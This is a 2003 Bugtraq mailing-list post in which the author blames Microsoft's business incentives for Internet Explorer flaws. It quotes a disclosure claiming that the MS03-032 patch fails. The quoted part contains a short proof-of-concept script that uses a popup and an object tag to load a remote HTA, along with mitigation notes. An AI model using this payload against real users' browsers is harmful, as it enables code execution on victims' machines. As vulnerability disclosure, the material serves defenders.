Message-ID: <3F5CEDD7.4040305@gs2.com.br>
From: bugtraq at gs2.com.br (Fabio Gomes de Souza)
Subject: BAD NEWS: Microsoft Security Bulletin MS03-032

Guys,

If Microsoft fixed IE holes, they would destroy the Adware/Spyware industry.

If Microsoft removed the Virus Support (TM) from their products, they 
would crash the entire antivirus industry (and this one is not small).

If Microsoft did a decent hotfix management solution, they would destroy 
the newly-created hotfix management industry.

If Microsoft managed the open ports of a Windows computer in a decent 
manner, Symantec, their friend who sells firewalls, would earn less money.

This list is endless. Too many cats to put in a bag.

Also endless is this issue. Market is the answer. When the market 
finally realizes that AT LEAST the OS must be Open Source, these problems 
will disappear.


http-equiv@...ite.com wrote:
> Since the cat somehow got out of the bag, and more importantly, this 
> is so blatantly obvious, herewith is the "Bad News":
> 
> The patch for Drew's object data=funky.hta doesn't work:
> 
> http://www.malware.com/badnews.html
> 
> <script>
>   var oPopup = window.createPopup();
> 
>   function showPopup() {
>     oPopup.document.body.innerHTML = "<object data=ouch.php>";
>     oPopup.show(0,0,1,1,document.body);
>   }
>   
>   showPopup()
> </script>
> 
> Notes:
> 
> 1. Disable Active Scripting
> 2. In case that does not work, uninstall Internet Explorer
> 3. http://www.eeye.com/html/Research/Advisories/AD20030820.html
> 4. This was sent to the manufacturer quite some time prior to this
>    going out. Surprisingly no immediate acknowledgement
> 5. This is so blatantly obvious, in particular because it is
>    the coupling of two known issues [one current + one from 2002]:
> 
>    http://www.securityfocus.com/bid/3867/
> 
> It is beyond comprehension why this was not checked from the
> outset as it is a known issue plus file://::{CLSID} in the control
> panel in the object tag still functions to date.
> 6. At this stage one must really question the competency of this
> particular operation. This is a pathetic oversight.
> 

